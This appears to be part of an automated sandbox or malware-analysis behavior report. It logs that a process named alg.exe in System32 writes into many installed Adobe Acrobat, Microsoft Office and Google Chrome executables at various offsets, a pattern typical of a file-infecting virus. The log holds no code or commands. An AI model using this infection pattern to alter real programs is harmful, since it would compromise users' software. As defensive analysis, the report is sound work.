                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 123904Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 697420Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 697344Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 66716Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 1102848Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 1676364Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 1676288Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 753617Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 2531840Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 3105356Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 3105280Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 1150992Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 459776Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 1033292Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 1033216Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 209348Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 99840Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 673356Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 673280Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 69527Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 256512Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 830028Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 829952Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 72028Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 521216Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 1094732Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 1094656Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 321696Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 210944Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 784460Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 784384Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 126840Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 13312Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 586828Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 586752Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 2828Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 4785664Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 5359180Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 5359104Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 2430581Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 632832Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 1206348Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 1206272Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 206444Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 2578944Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 3152460Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 3152384Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 16859Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 1617920Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 2191436Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 2191360Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 860981Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 258048Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 831564Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 831488Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 82352Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 5274624Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 5848140Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 5848064Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 3286540Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 185344Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 758860Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 758784Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 151349Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 26954240Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 27527756Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 27527680Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 11401068Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 4392960Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 4966476Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 4966400Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 2843313Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe offset: 1576448Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe offset: 2149964Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe offset: 2149888Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe offset: 574636Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe offset: 4318208Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe offset: 4891724Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe offset: 4891648Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe offset: 1700540Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe offset: 4318208Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe offset: 4891724Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe offset: 4891648Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe offset: 1700540Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe offset: 1404928Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe offset: 1978444Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe offset: 1978368Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe offset: 633260Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 1199616Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 1773132Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 0Jump to behavior
                        Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 1773056Jump to behavior
